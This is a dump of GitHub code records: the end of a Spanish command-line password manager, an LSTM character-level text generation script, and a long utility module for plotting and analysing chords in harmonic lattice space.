else:\n n = len(contrasenas[contrasenas['login'].isin(args)])\n contrasenas['contrasena'][contrasenas['login'].isin(args)] = np.array([generar_contrasena() for i in range(n)])\n \n guardar_contrasenas(contrasenas)\n\n#cambiar_contrasena_maestra()\n\ndef cambiar_contrasena_maestra():\n\n raw = input(\"Ingresar contrasena maestra: \")\n \n archivo = open(\"contrasena_maestra\", \"rb\")\n contrasena = archivo.read()\n archivo.close()\n \n if hashlib.sha256(raw.encode()).digest() == contrasena:\n\n raw_1 = input(\"Escribir contraseña: \")\n raw_2 = input(\"Escribir de nuevo la contraseña: \")\n \n if raw_1 == raw_2:\n \n archivo = open(\"contrasena_maestra\", \"wb\")\n archivo.write(hashlib.sha256(raw_1.encode()).digest());\n archivo.close()\n \n global contrasena_maestra\n contrasena_maestra = raw_1\n global cipher\n cipher = AESCipher(contrasena_maestra)\n else:\n print(\"Las contraseñas no coinciden\")\n\n else:\n print(\"La contraseña es incorrecta.\")\n\n#ayuda()\n\ndef ayuda():\n\n print(\"Se pueden usar las siguientes funciones:\\n\\nsalir()\\nayuda()\\n\\nagregar_cuenta()\\nmostrar_cuenta()\\neliminar_cuenta()\\n\\ncambiar_contrasena()\\ncambiar_contrasena_maestra()\")\n\n#menu()\n\ndef menu():\n\n comando = None\n print(\"Escribir ayuda() para ver más opciones. Para salir, escribir salir().\")\n \n while comando != \"salir\":\n \n raw = input(\"$ \")\n try:\n comando_raw = re.search(r\"(^.*)(\\(.*)\", raw).group(1)\n except:\n comando_raw = \"\"\n \n if comando_raw in [\"salir\", \"ayuda\", \"agregar_cuenta\", \"mostrar_cuenta\", \n \"eliminar_cuenta\", \"cambiar_contrasena\", \n \"cambiar_contrasena_maestra\"]:\n comando = comando_raw\n eval(raw)\n \n else:\n print(\"Función inválida. Para más información escribir ayuda().\")\n\n#inicio()\n\ndef inicio():\n\n while(not os.path.exists('contrasena_maestra')):\n print(\"Para usar el gestor de contraseñas, se tiene que crear una contraseña maestra.\")\n crear_contrasena_maestra()\n \n autenticado = 0\n\n while autenticado == 0:\n autenticado = verificar_contrasena_maestra()\n if autenticado == 0:\n print(\"La contraseña es incorrecta.\")\n global cipher\n cipher = AESCipher(contrasena_maestra)\n menu()\n\ninicio()\n","repo_name":"gonzalezalfie/gestor_contrasenas","sub_path":"gestor_contrasenas.py","file_name":"gestor_contrasenas.py","file_ext":"py","file_size_in_byte":8456,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"39914008558","text":"from __future__ import print_function\nfrom OkapiV2.Core import Model, Branch\nfrom OkapiV2 import Activations\nfrom OkapiV2.Layers.Basic import FullyConnected, Dropout\nfrom OkapiV2.Layers.Activations import ActivationLayer\nfrom OkapiV2.Layers.Recurrent import LSTM\nimport numpy as np\nimport random\nimport sys\n\npath = 'data/lear.txt'\ntext = open(path).read().lower()\nprint('corpus length:', len(text))\n\nchars = set(text)\nprint('total chars:', len(chars))\nchar_indices = dict((c, i) for i, c in enumerate(chars))\nindices_char = dict((i, c) for i, c in enumerate(chars))\n\n# cut the text in semi-redundant sequences of maxlen characters\nmaxlen = 20\nstep = 3\nsentences = []\nnext_chars = []\nfor i in range(0, len(text) - maxlen, step):\n sentences.append(text[i: i + maxlen])\n next_chars.append(text[i + maxlen])\nprint('nb sequences:', len(sentences))\n\nprint('Vectorization...')\nX = np.zeros((len(sentences), maxlen, len(chars)), dtype=np.bool)\ny = np.zeros((len(sentences), len(chars)), dtype=np.bool)\nfor i, sentence in enumerate(sentences):\n for t, char in enumerate(sentence):\n X[i, t, char_indices[char]] = 1\n y[i, char_indices[next_chars[i]]] = 1\n\n\n# build the model: 2 stacked LSTM\nprint('Build model...')\ntree = Branch()\ntree.add_layer(LSTM((512, 1, 1, 1), return_sequences=True))\ntree.add_layer(Dropout(0.2))\ntree.add_layer(LSTM((512, 1, 1, 1), return_sequences=False))\ntree.add_layer(Dropout(0.2))\ntree.add_layer(FullyConnected())\ntree.add_layer(ActivationLayer(Activations.softmax))\ntree.add_input(X)\n\nmodel = Model()\nmodel.set_tree(tree)\n\ndef sample(a, temperature=1.0):\n # helper function to sample an index from a probability array\n a = np.log(a) / temperature\n a = np.exp(a) / np.sum(np.exp(a))\n return np.argmax(np.random.multinomial(1, a, 1))\n\n# train the model, output generated text after each iteration\nfor iteration in range(1, 60):\n print()\n print('-' * 50)\n print('Iteration', iteration)\n model.train([X], y, num_epochs=1)\n\n start_index = random.randint(0, len(text) - maxlen - 1)\n\n for diversity in [0.2, 0.5, 1.0, 1.2]:\n print()\n print('----- diversity:', diversity)\n\n generated = ''\n sentence = text[start_index: start_index + maxlen]\n generated += sentence\n print('----- Generating with seed: \"' + sentence + '\"')\n sys.stdout.write(generated)\n\n for iteration in range(400):\n x = np.zeros((1, maxlen, len(chars)))\n for t, char in enumerate(sentence):\n x[0, t, char_indices[char]] = 1.\n\n preds = model.predict([x])[0]\n next_index = sample(preds, diversity)\n next_char = indices_char[next_index]\n\n generated += next_char\n sentence = sentence[1:] + next_char\n\n sys.stdout.write(next_char)\n sys.stdout.flush()\n print()\n model.save_params('shakespeare_params_vec.pk')\n","repo_name":"agajews/Neural-Network-Dev","sub_path":"okapi_shakespeare_2.py","file_name":"okapi_shakespeare_2.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"25852894357","text":"import itertools, json, math\nfrom fractions import Fraction\nimport numpy as np\nimport math\nimport numpy_indexed as npi\nfrom matplotlib import pyplot as plt\nfrom matplotlib.patches import FancyArrowPatch\nfrom mpl_toolkits import mplot3d\nfrom mpl_toolkits.mplot3d import proj3d\nfrom matplotlib.legend_handler import HandlerPatch\nimport matplotlib.patches as mpatches\nimport matplotlib.colors\nimport networkx as nx\nfrom networkx.drawing.nx_agraph import graphviz_layout\nfrom scipy.spatial.distance import cdist\n\n\ndef make_legend_arrow(legend, orig_handle,\n xdescent, ydescent,\n width, height, fontsize):\n p = mpatches.FancyArrow(0, 0.5*height, width, 0, length_includes_head=True, head_width=0.75*height )\n return p\n\nclass Arrow3D(FancyArrowPatch):\n def __init__(self, xs, ys, zs, *args, **kwargs):\n FancyArrowPatch.__init__(self, (0,0), (0,0), *args, **kwargs)\n self._verts3d = xs, ys, zs\n\n def draw(self, renderer):\n xs3d, ys3d, zs3d = self._verts3d\n xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)\n self.set_positions((xs[0],ys[0]),(xs[1],ys[1]))\n FancyArrowPatch.draw(self, renderer)\n\ndef cents_to_hz(cents, root):\n return root * (2 ** (1/12)) ** (cents/100)\n\ndef hz_to_cents(hz, root):\n return 1200 * math.log2(hz / root)\n\ndef get_segments(pts):\n combs = list(itertools.combinations(range(len(pts)), 2))\n segments = np.array([(pts[i[0]], pts[i[1]]) for i in combs])\n if len(segments) > 0:\n is_neighbor = np.sum(np.abs(segments[:, 0] - segments[:, 1]), axis=1) == 1\n segments = segments[is_neighbor]\n segments = np.transpose(segments, axes=(0, 2, 1))\n return segments\n\ndef get_ratios(pts, primes, octaves = None, oct_generalized = False, string=True):\n if np.all(octaves == None):\n octaves = np.repeat(0, len(primes))\n prods = np.product((primes * (2.0**octaves)) ** pts, axis=1)\n fracs = [Fraction(i).limit_denominator(1000) for i in prods]\n if oct_generalized == True:\n for f in range(len(fracs)):\n while fracs[f] >= 2:\n fracs[f] /= 2\n while fracs[f] < 1:\n fracs[f] *= 2\n str_fracs = [str(i.numerator) + ':' + str(i.denominator) for i in fracs]\n if string == True:\n return str_fracs\n else:\n return fracs\n\n\n# TODO remove plotting from utils and change import refs to import from plot.py\ndef make_plot(pts, primes, path, octaves = None, draw_points = None,\n oct_generalized = False, dot_size=1, colors=None, ratios=True,\n origin=False, origin_range = [-2, 3], get_ax=False, legend=True,\n range_override=[0, 0], transparent=False, connect_color='grey',\n draw_point_visible=False, draw_color='seagreen', connect_size=1,\n file_type='pdf', opacity=0.5, root_layout=False, elev=16, azim=-72):\n\n\n c = matplotlib.colors.get_named_colors_mapping()\n if np.all(colors == None):\n colors = ['black' for i in range(len(pts))]\n else:\n colors = [c[i.lower()] for i in colors]\n if np.all(octaves == None):\n octaves = np.repeat(0, len(primes))\n if np.all(draw_points == None):\n segments = get_segments(pts)\n else:\n segments = get_segments(np.concatenate((pts, draw_points)))\n\n ratios = get_ratios(pts, primes, octaves, oct_generalized)\n fig = plt.figure(figsize=[8, 6])\n ax = mplot3d.Axes3D(fig, elev=elev, azim=azim)\n ax.set_axis_off()\n\n min = np.min(pts)\n if min > range_override[0]:\n min = range_override[0]\n max = np.max(pts)\n if max < range_override[1]:\n max = range_override[1]\n\n\n if origin == True:\n quiver_min = origin_range[0]\n quiver_max = origin_range[1]\n q_diff = quiver_max - quiver_min\n if max < quiver_max:\n max = quiver_max\n if min > quiver_min:\n min = quiver_min\n x, y, z = np.array([[quiver_min, 0, 0],[0, quiver_min, 0],[0, 0, quiver_min]])\n u, v, w = np.array([[q_diff, 0, 0],[0, q_diff, 0],[0, 0, q_diff]])\n ax.quiver(x, y, z, u, v, w, arrow_length_ratio=0.1, color=\"black\", zorder=-1)\n for tick in range(quiver_min+1, quiver_max):\n a = [-0.0625, 0.0625]\n b = [0, 0]\n c = [tick, tick]\n ax.plot(a, b, c, color='black')\n ax.plot(b, a, c, color='black')\n ax.plot(a, c, b, color='black')\n ax.plot(c, a, b, color='black')\n ax.plot(b, c, a, color='black')\n ax.plot(c, b, a, color='black')\n\n\n if root_layout == True:\n for pt in pts:\n ax.plot([0, pt[0]], [0, pt[1]], [0, pt[2]], color='green')\n ax.plot([pt[0], pt[0]], [0, pt[1]], [0, pt[2]], color='green')\n ax.plot([0, pt[0]], [pt[1], pt[1]], [0, pt[2]], color='green')\n ax.plot([0, pt[0]], [0, pt[1]], [pt[2], pt[2]], color='green')\n\n xyz = [pts[:, 0], pts[:, 1], pts[:, 2]]\n for i, pt in enumerate(pts):\n ax.scatter(pt[0], pt[1], pt[2], color=colors[i], depthshade=False,\n s=int(60 * dot_size))\n if draw_point_visible==True:\n for i, pt in enumerate(draw_points):\n ax.scatter(pt[0], pt[1], pt[2], color=c[draw_color],\n depthshade=False, s=int(60 * dot_size))\n if ratios == True:\n for i, pt in enumerate(pts):\n ax.text(pt[0] - 0.15, pt[1] + 0.25, pt[2], ratios[i], c='black',\n horizontalalignment='right', size='large')\n for seg in segments:\n ax.plot(seg[0], seg[1], seg[2], color=connect_color, alpha=opacity, lw=connect_size)\n\n ax.set_xlim3d([min, max])\n ax.set_ylim3d([min, max])\n ax.set_zlim3d([min, max])\n plt.savefig(path + '.' + file_type, transparent=transparent)\n plt.close(fig)\n\n if legend == True:\n\n fig = plt.figure(figsize=[8, 6])\n ax = mplot3d.Axes3D(fig, elev=elev, azim=azim)\n x_arrow = Arrow3D([-.005, 0.25], [0, 0], [0, 0], mutation_scale=20, lw=1, arrowstyle='-|>', color='black')\n y_arrow = Arrow3D([0, 0], [-0.01, 0.5], [0, 0], mutation_scale=20, lw=1, arrowstyle='-|>', color='black')\n z_arrow = Arrow3D([0, 0], [0, 0], [-0.01, 0.35], mutation_scale=20, lw=1, arrowstyle='-|>', color='black')\n ax.add_artist(x_arrow)\n ax.add_artist(y_arrow)\n ax.add_artist(z_arrow)\n ratios = primes * (2.0 ** octaves)\n\n ax.text(0.25, 0, 0, Fraction(ratios[0]), color='black', size=4 * dot_size)\n ax.text(0, 0.5, -0.03, Fraction(ratios[1]), color='black', size=4 * dot_size)\n z = ax.text(0.03, 0, 0.3, Fraction(ratios[2]), color='black', size=4 * dot_size)\n ax.set_axis_off()\n plt.savefig(path + '_legend.' + file_type, transparent=transparent)\n plt.close()\n\n\n\n\n\ndef make_shell_plot(shell, pts, primes, path, octaves = None, draw_points = None,\n oct_generalized = False, dot_size=1, colors=None, ratios=True,\n origin=False, origin_range = [-2, 3], get_ax=False, legend=True,\n range_override=[0, 0], transparent=False, shell_color='grey',\n point_color='black', draw_point_visible=False, connect_size=1,\n shell_dot_size=None, angles=True):\n if shell_dot_size == None:\n shell_dot_size = dot_size\n c_ = matplotlib.colors.get_named_colors_mapping()\n if np.all(colors == None):\n colors = ['black' for i in range(len(pts))]\n else:\n colors = [c[i.lower()] for i in colors]\n if np.all(octaves == None):\n octaves = np.repeat(0, len(primes))\n if np.all(draw_points == None):\n point_segments = get_segments(pts)\n shell_segments = get_segments(shell)\n else:\n point_segments = get_segments(np.concatenate((pts, draw_points)))\n shell_segments = get_segments(shell)\n ratios = get_ratios(pts, primes, octaves, oct_generalized)\n fig = plt.figure(figsize=[8, 6])\n ax = mplot3d.Axes3D(fig, elev=13, azim=-52)\n ax.set_axis_off()\n\n min = np.min(shell)\n if min > range_override[0]:\n min = range_override[0]\n max = np.max(shell)\n if max < range_override[1]:\n max = range_override[1]\n\n\n if origin == True:\n quiver_min = origin_range[0]\n quiver_max = origin_range[1]\n q_diff = quiver_max - quiver_min\n if max < quiver_max:\n max = quiver_max\n if min > quiver_min:\n min = quiver_min\n x, y, z = np.array([[quiver_min, 0, 0],[0, quiver_min, 0],[0, 0, quiver_min]])\n u, v, w = np.array([[q_diff, 0, 0],[0, q_diff, 0],[0, 0, q_diff]])\n ax.quiver(x, y, z, u, v, w, arrow_length_ratio=0.1, color=\"black\", zorder=-1)\n for tick in range(quiver_min+1, quiver_max):\n a = [-0.0625, 0.0625]\n b = [0, 0]\n c = [tick, tick]\n ax.plot(a, b, c, color='black')\n ax.plot(b, a, c, color='black')\n ax.plot(a, c, b, color='black')\n ax.plot(c, a, b, color='black')\n ax.plot(b, c, a, color='black')\n ax.plot(c, b, a, color='black')\n\n if angles == True and len(pts) > 1:\n combs = [i for i in itertools.combinations(range(len(pts)), 2)]\n for i, indices in enumerate(combs):\n arc = draw_arc(pts[indices[0]], pts[indices[1]], 0.2 + 0.05 *i)\n ax.scatter(arc[:,0], arc[:, 1], arc[:, 2], color='green', s=1)\n for pt in pts:\n ax.plot([0, pt[0]], [0, pt[1]], [0, pt[2]], color='blue', lw=connect_size)\n\n for i, pt in enumerate(shell):\n\n ax.scatter(pt[0], pt[1], pt[2], color=c_[shell_color], depthshade=False,\n s=int(60 * shell_dot_size))\n for seg in shell_segments:\n ax.plot(seg[0], seg[1], seg[2], color=c_[shell_color], alpha=0.5, lw=connect_size)\n\n for i, pt in enumerate(pts):\n if i == 0:\n # spreviously color here was hard coded to red\n ax.scatter(pt[0], pt[1], pt[2], color=c_[point_color], depthshade=False,\n s=int(60 * dot_size))\n else:\n ax.scatter(pt[0], pt[1], pt[2], color=c_[point_color],\n depthshade=False, s=int(60 * dot_size))\n\n for seg in point_segments:\n ax.plot(seg[0], seg[1], seg[2], color=c_[point_color], alpha=0.5, lw=10)\n\n if ratios == True:\n for i, pt in enumerate(pts):\n ax.text(pt[0] - 0.15, pt[1] + 0.25, pt[2], ratios[i], c='black',\n horizontalalignment='right', size='large')\n\n\n ax.set_xlim3d([min, max])\n ax.set_ylim3d([min, max])\n ax.set_zlim3d([min, max])\n plt.savefig(path + '.pdf', transparent=transparent)\n plt.close(fig)\n\ndef cartesian_product(*arrays):\n la = len(arrays)\n dtype = np.result_type(*arrays)\n arr = np.empty([len(a) for a in arrays] + [la], dtype=dtype)\n for i, a in enumerate(np.ix_(*arrays)):\n arr[..., i] = a\n return arr.reshape(-1, la)\n\ndef is_fully_connected(points):\n \"\"\"Returns True if all points are exactly one unit away from at least one\n other point; else returns False\"\"\"\n full_truth = []\n for point in points:\n other_points = points[np.invert((points == point).all(axis=1))]\n truth_array = []\n for op in other_points:\n one = np.count_nonzero(np.abs(point - op) == 1) == 1\n zero = np.count_nonzero(point - op == 0) == 2\n truth = one and zero\n truth_array.append(truth)\n full_truth.append(np.any(truth_array))\n return np.all(full_truth)\n\ndef flatten(iterable):\n return list(itertools.chain.from_iterable(iterable))\n\ndef sub_branches(points):\n \"\"\"Given the points that make up a chord, returns the list of all subsets of\n those points that form branches. If lens == true, the returned array is\n nested into groups by chord size, in decreasing order.\n \"\"\"\n out = []\n size = len(points)\n while True:\n potential_indexes = np.array([i for i in itertools.combinations(range(len(points)), size)])\n for pi in potential_indexes:\n if is_fully_connected(points[pi]):\n out.append(pi)\n size -= 1\n if size == 1:\n break\n sb = [points[i] for i in out]\n return sb\n\ndef unique_sub_branches(points, count=False):\n \"\"\"If given points, gets sub_branches, transfers all to ordinal, splits\n into groups based on length, and remove duplicates from each of those groups,\n before putting all unique sub branches back into an output array that is\n returned\"\"\"\n # TODO make this avoid getting the sub branches twice, by letting the input\n # be sub_branches or points.\n sb = [reorder_points(cast_to_ordinal(i)) for i in sub_branches(points)]\n lens = list(set([len(i) for i in sb]))[::-1]\n if count == True:\n sb_groups = [np.array([i for i in sb if len(i) == j]) for j in lens]\n usb_groups = [npi.unique(i, return_index=True, return_count=True) for i in sb_groups]\n usb = list(i[0] for i in usb_groups)\n idx = list(i[1] for i in usb_groups)\n cts = list(i[2] for i in usb_groups)\n\n all_matches = []\n ct = 0\n for l_i in range(len(sb_groups)):\n for unq in usb[l_i]:\n matches = []\n for i, sb in enumerate(sb_groups[l_i]):\n intersect = npi.intersection(unq, sb)\n if len(intersect) == len(unq):\n matches.append(ct + i)\n all_matches.append(matches)\n ct += len(sb_groups[l_i])\n return flatten(usb), all_matches\n else:\n usb_groups = [npi.unique(np.array([i for i in sb if len(i) == j])) for j in lens]\n usb = flatten(usb_groups)\n return usb\n\ndef get_transposition_shell(points):\n \"\"\"Given the points that make up a branch rooted at the origin, returns the\n points that make up its rotation shell.\"\"\"\n dims = np.shape(points)[-1]\n permutations = np.array([i for i in itertools.permutations(range(dims))])\n # print(np.shape(points))\n # print(np.shape(permutations))\n # try:\n # perms = points[:, permutations]\n # except:\n # print(points, permutations)\n # perms = points[0][:, permutations]\n perms = points[:, permutations]\n transpositions = perms.transpose((1, 0, *range(2, len(np.shape(perms)))))\n all_points = np.concatenate(transpositions)\n unique = np.unique(all_points, axis=0)\n return unique\n\ndef get_multipath_shell(points):\n for point in points:\n multipath = cartesian_product(*[np.arange(i+1) for i in point])\n if 'multipath_shell' not in locals():\n multipath_shell = multipath\n else:\n multipath_shell = np.vstack((multipath_shell, multipath))\n return np.unique(multipath_shell, axis=0)\n\ndef get_transpositions(points):\n points = np.array(points)\n dims = np.shape(points)[-1]\n permutations = np.array([i for i in itertools.permutations(range(dims))])\n perms = points[:, permutations]\n transpositions = perms.transpose((1, 0, *range(2, len(np.shape(perms)))))\n return transpositions\n\ndef get_stability(points):\n \"\"\"The average of the proportion of rotations in which each unique\n position is occupied\"\"\"\n rots = get_transpositions(points)\n shape = np.shape(rots)\n pos_in_rots = np.unique(rots, axis=1)\n pos_tot = npi.union(*[i for i in rots])\n all_pos_occurences = pos_in_rots.reshape((np.int(np.size(pos_in_rots) / 3), 3))\n pos_tot, counts = np.unique(all_pos_occurences, axis=0, return_counts=True)\n out = np.round(np.mean(counts) / 6, 2)\n return out\n\ndef get_loops(points):\n \"\"\"Returns the number of loops in the structure of the chord\"\"\"\n ct = 0\n diffs = points[:, None] - points[None, :]\n diffs = np.linalg.norm(diffs, axis=2)\n\n one_inds = np.array(np.nonzero(diffs == 1)).T\n root_two_inds = np.array(np.nonzero(diffs == np.sqrt(2))).T\n\n filtered_root_two_inds = []\n for i in root_two_inds:\n truth = True\n for j in filtered_root_two_inds:\n if np.all(i[::-1] == j):\n truth = False\n if truth:\n filtered_root_two_inds.append(i)\n filtered_root_two_inds = np.array(filtered_root_two_inds)\n\n for i in filtered_root_two_inds:\n ones_a = one_inds[np.nonzero(one_inds[:,0] == i[0])]\n ones_b = one_inds[np.nonzero(one_inds[:,0] == i[1])]\n points_a = points[ones_a[:, 1]]\n points_b = points[ones_b[:, 1]]\n intersections = npi.intersection(points_a, points_b)\n if len(intersections) == 2:\n ct += 1\n return ct / 2\n\ndef get_complement_shell(points):\n \"\"\"Given the points that make up a branch rooted at the origin, returns the\n points that make up its complement shell.\"\"\"\n maxs = np.max(points, axis=0)\n complement_shell = np.array(((0, 0, 0))).reshape((1, 3))\n for point in points:\n shell = [np.array([k for k in range(i + 1)]) for i in point]\n shell = cartesian_product(*shell)\n complement_shell = np.concatenate((complement_shell, shell), axis=0)\n complement_shell = np.unique(complement_shell, axis=0)\n return complement_shell\n\ndef is_contained_by(point, container):\n \"\"\"Returns True if point is contained by container\"\"\"\n return np.all(point - container >= 0)\n\ndef containment_relationship(A, B):\n \"\"\"For two points, returns 0 if there is no containment relationship,\n 1 if A contains B, and 2 if B contains A.\"\"\"\n if is_contained_by(B, A):\n return 1\n elif is_contained_by(A, B):\n return 2\n else:\n return 0\n\ndef are_roots(points):\n \"\"\"Returns an array of boolean values assessing if each point is a root by\n testing if each point is contained by any of the other points.\"\"\"\n out = []\n points = np.array(points)\n for point in points:\n other_points = points[np.invert((points == point).all(axis=1))]\n truth_array = []\n for op in other_points:\n truth_array.append(is_contained_by(point, op))\n out.append(not np.any(np.array(truth_array)))\n return np.array(out)\n\ndef are_extremities(points):\n \"\"\"Returns an array of boolean values assessing if each point is an\n extremity by testing if each point contains any other points.\"\"\"\n out = []\n for point in points:\n other_points = points[np.invert((points == point).all(axis=1))]\n truth_array = []\n for op in other_points:\n truth_array.append(is_contained_by(op, point))\n out.append(not np.any(np.array(truth_array)))\n return np.array(out)\n\ndef are_root_breakpoints(points):\n \"\"\"Returns an array of boolean values assessing if each point is a root\n breakpoint by testing if it is contained by two roots, and is the simplest\n point contained by those two roots\"\"\"\n points = np.array(points)\n roots = points[are_roots(points)]\n combs = itertools.combinations(range(len(roots)), 2)\n out = np.zeros(len(points), dtype=bool)\n for comb in combs:\n potential_breakpoints = []\n for point in points:\n test_1 = is_contained_by(point, roots[comb[0]])\n test_2 = is_contained_by(point, roots[comb[1]])\n if test_1 and test_2:\n potential_breakpoints.append(point)\n potential_breakpoints = np.array(potential_breakpoints)\n if len(potential_breakpoints) > 1:\n sorts = np.argsort([sum(i) for i in potential_breakpoints])\n breakpoint = potential_breakpoints[sorts][0]\n elif len(potential_breakpoints) == 1:\n breakpoint = potential_breakpoints[0]\n elif len(potential_breakpoints) == 0:\n breakpoint = None\n for i, pt in enumerate(points):\n if str(breakpoint) == str(pt):\n out[i] = True\n return out\n\ndef are_extremity_breakpoints(points):\n \"\"\"Returns an array of boolean values assessing if each point is an extremity\n breakpoint by testing if it contains by two extremities, and is the most complex\n point that contains those two roots\"\"\"\n points = np.array(points)\n extremities = points[are_extremities(points)]\n combs = itertools.combinations(range(len(extremities)), 2)\n out = np.zeros(len(points), dtype=bool)\n for comb in combs:\n potential_breakpoints = []\n for point in points:\n test_1 = is_contained_by(extremities[comb[0]], point)\n test_2 = is_contained_by(extremities[comb[1]], point)\n if test_1 and test_2:\n potential_breakpoints.append(point)\n potential_breakpoints = np.array(potential_breakpoints)\n if len(potential_breakpoints) > 1:\n sorts = np.argsort([sum(i) for i in potential_breakpoints])\n breakpoint = potential_breakpoints[sorts][-1]\n elif len(potential_breakpoints) == 1:\n breakpoint = potential_breakpoints[0]\n elif len(potential_breakpoints) == 0:\n breakpoint = None\n for i, pt in enumerate(points):\n if str(breakpoint) == str(pt):\n out[i] = True\n return out\n\ndef unique_permutations(arr):\n return np.array(list(set(itertools.permutations(arr))))\n\ndef paths_to_point(point, root = [0, 0, 0]):\n \"\"\"Returns a list of sets of points outlining each of the possible paths\n between root and point. (Currently only for 3D)\"\"\"\n point = np.array(point)\n root = np.array(root)\n point = point - root\n num_of_paths = np.product(point + 1)\n increments_0 = np.repeat(0, point[0])\n increments_1 = np.repeat(1, point[1])\n increments_2 = np.repeat(2, point[2])\n increments = np.hstack((increments_0, increments_1, increments_2))\n inc_paths = unique_permutations(increments)\n paths = []\n for ip in inc_paths:\n path = np.zeros((len(ip) + 1, 3), dtype = int)\n for i, item in enumerate(ip):\n path[i+1:, item] += 1\n path += root\n paths.append(path)\n paths = np.array(paths)\n return paths\n\ndef cast_to_ordinal(points, verbose=False):\n # needs to be fixed, not discriminating enough!\n \"\"\"Given a list of harmonic space vectors, returns the collection cast to\n ordinal position. That is, with dimensions sorted firstly by max extent from\n origin, secondly by average extent in each dimension, and thirdly by order\n of extent in each dimension of point with furthest manhattan\n distance from origin.\"\"\"\n # TODO DOESN't work in more than 4 dimensions!!!\n\n mins = np.min(points, axis=0)\n points = points - mins\n origin = np.repeat(0, np.shape(points)[-1])\n dims = np.shape(points)[-1]\n\n avg = np.average(points, axis=0)\n avg_dup_indexes = indexes_of_duplicates(avg)\n if verbose and len(avg_dup_indexes) > 1:\n\n print('Potentially fatal: multiple avg dups!')\n print(points)\n if len(avg_dup_indexes) == 1:\n avg_dup_indexes = avg_dup_indexes[0]\n avg_order = np.argsort(-1 * avg)\n points = points[:, avg_order]\n\n maxs = np.max(points) - np.max(points, axis=0)\n avg_dup_maxs = indexes_of_duplicates(maxs)\n if verbose and len(avg_dup_maxs) > 1:\n print('Potentially fatal: multiple avg maxs!')\n print(points)\n if len(avg_dup_maxs) == 1:\n avg_dup_maxs = avg_dup_maxs[0]\n max_order = np.argsort(maxs)\n points = points[:, max_order]\n # print(avg_dup_indexes, avg_dup_maxs, '\\n\\n\\n')\n shared_dims = np.intersect1d(avg_dup_indexes, avg_dup_maxs)\n if verbose and len(shared_dims) > 2:\n print('Potentially fatal: shared dims greater than 2!')\n print(points, '\\n')\n if len(shared_dims) == 2 and dims > 2:\n dims = np.arange(np.shape(points)[-1])\n non_shared_dims = dims[np.invert(npi.contains(shared_dims, dims))]\n\n #discriminatory collection\n shared_dim_points = points[:, shared_dims]\n equal_filter = shared_dim_points[:,0] - shared_dim_points[:,1] == 0\n\n non_shared_dim_points = points[:, non_shared_dims]\n seperated_dup_inds = indexes_of_duplicates_2d(non_shared_dim_points)\n\n inverted_inds = []\n for dup_inds in seperated_dup_inds:\n combs = itertools.combinations(dup_inds, 2)\n for comb in combs:\n if np.all(shared_dim_points[comb[0]] == shared_dim_points[comb[1]][::-1]):\n for c in comb:\n inverted_inds.append(c)\n inverted_filter = npi.contains(np.array(inverted_inds), np.arange(len(points)))\n filter = np.invert(np.logical_or(equal_filter,inverted_filter))\n C_dis = points[filter]\n if len(C_dis > 0):\n mds = np.sum(C_dis, axis=1)\n max_mds = np.max(mds)\n # if np.count_nonzero(mds == max_mds) > 1:\n # print('Potentially fatal: shared max manhattan distances in C_dis')\n # print(mds)\n # print(C_dis)\n T_mmd = C_dis[np.argmax(mds)]\n dis_sorts = np.argsort(T_mmd[shared_dims])[::-1]\n sorts = dims[:]\n sorts[shared_dims] = dis_sorts\n sorts = np.argsort(sorts)\n points = points[:, sorts]\n return points\n\ndef indexes_of_duplicates(arr):\n \"\"\"Given a 1-d numpy array, arr, returns a list of numpy arrays each filled with\n the indexes of any items in arr that appear more than once.\"\"\"\n arr = np.array(arr)\n idx_sort = np.argsort(arr)\n sorted = arr[idx_sort]\n vals, idx_start, count = np.unique(sorted, return_counts=True, return_index=True)\n res = np.split(idx_sort, idx_start[1:])\n vals = vals[count > 1]\n res = filter(lambda x: x.size > 1, res)\n return list(res)\n\ndef indexes_of_duplicates_2d(arr):\n \"\"\"Given a 2-d numpy array, arr, returns a list of numpy arrays each filled with\n the indexes of any items in arr that appear more than once.\"\"\"\n arr = np.array(arr)\n unq = npi.unique(arr)\n out = [np.nonzero(npi.contains([u], arr))[0] for u in unq]\n out = [i for i in out if len(i) > 1]\n return out\n\ndef get_ordinal_sorts(points):\n \"\"\"Returns a sorting array that would cast a set of points to ordinal\n position. \"\"\"\n mins = np.min(points, axis=0)\n points = points - mins\n origin = np.repeat(0, np.shape(points)[-1])\n\n # index of max manhattan distance\n bc_origin = np.broadcast_to(origin, np.shape(points))\n manhattan_distance = cdist(bc_origin, points, metric='cityblock')\n max_md_index = np.argmax(manhattan_distance)\n max_md_order = np.argsort(points[max_md_index])[::-1]\n points = points[:, max_md_order]\n\n avg_order = np.argsort(-1 * np.average(points, axis=0))\n points = points[:, avg_order]\n max_order = np.argsort(np.max(points) - np.max(points, axis=0))\n points = points[:, max_order]\n return np.array((max_md_order, avg_order, max_order))\n\ndef reorder_points(points):\n \"\"\"Reorders points such that they are in a consistent order for testing for\n uniqueness against other sets of points.\"\"\"\n primes = np.array((2.0, 3, 5, 7, 11, 13, 17, 19))[:np.shape(points)[-1]]\n mult = np.product(primes ** points, axis=1)\n indexes = np.argsort(mult)\n return points[indexes]\n\ndef draw_arc(A, B, r = 0.25):\n A = np.where(A != 0, A / np.linalg.norm(A), A)\n B = np.where(B != 0, B / np.linalg.norm(B), B)\n crossed = np.cross(A, B)\n B_alt = np.cross(crossed, A)\n\n B_alt = np.where(B_alt != 0, B_alt / np.linalg.norm(B_alt), B_alt)\n theta_limit = np.arccos(np.dot(A, B))\n\n\n theta = np.repeat(np.linspace(0, theta_limit, 100), 3).reshape((100, 3))\n return r * (np.cos(theta) * A + np.sin(theta) * B)\n\ndef create_tree_edges(points):\n # make a list of tuples describing orthogonal connections\n # and make a list of containments, for dotted lines\n out = []\n for p, point in enumerate(points):\n for op, other_point in enumerate(points[p:]):\n if np.linalg.norm(point - other_point) == 1:\n if is_contained_by(point, other_point):\n out.append((p, op+p))\n else:\n out.append((op+p, p))\n # out = sorted(out, key=lambda x: x[0])\n return out\n\ndef plot_tree(points, path, type='root'):\n \"\"\"\n\n possible types: root, extremity, root_extremity, root_breakpoint,\n extremity_breakpoint,\"\"\"\n edges = create_tree_edges(points)\n G=nx.MultiDiGraph(size='2, 4')\n G.add_edges_from(edges)\n edge_order = []\n for i in itertools.chain.from_iterable(edges):\n if i not in edge_order: edge_order.append(i)\n edge_order = np.array(edge_order)\n colors = np.repeat(0, 